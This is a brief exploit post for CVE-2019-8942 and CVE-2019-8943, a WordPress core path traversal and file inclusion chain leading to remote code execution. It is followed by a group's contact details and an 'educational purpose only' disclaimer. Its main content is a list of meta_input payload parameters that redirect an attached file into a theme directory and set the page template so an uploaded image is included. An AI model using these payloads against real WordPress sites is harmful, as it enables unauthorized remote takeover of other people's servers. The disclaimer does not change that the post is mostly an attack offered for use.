The flaw is the chain of a Path Traversal and Local File Inclusion vulnerability that lead to Remote Code Execution in the WordPress core and full remote takeover.
cve-2019-8942 & 2019-8943
Author: Simon Scannell
Manual Poc by Legion
Payload:
&meta_input[_wp_attached_file]=year/month/file#/file
&meta_input[_wp_attached_file]=year/month/file#/../../../../themes/twentyseventeen/file
&meta_input[_wp_page_template]=cropped image
If You face any Problem
You can Contact with Us
..............................................................................................................
Contact:::
..............................................................................................................
Facebook:
/ error.squad.bh
==============================
Please Don't Forget To Subscribe & Like
==============================
This tutorial is just for educational purpose only.......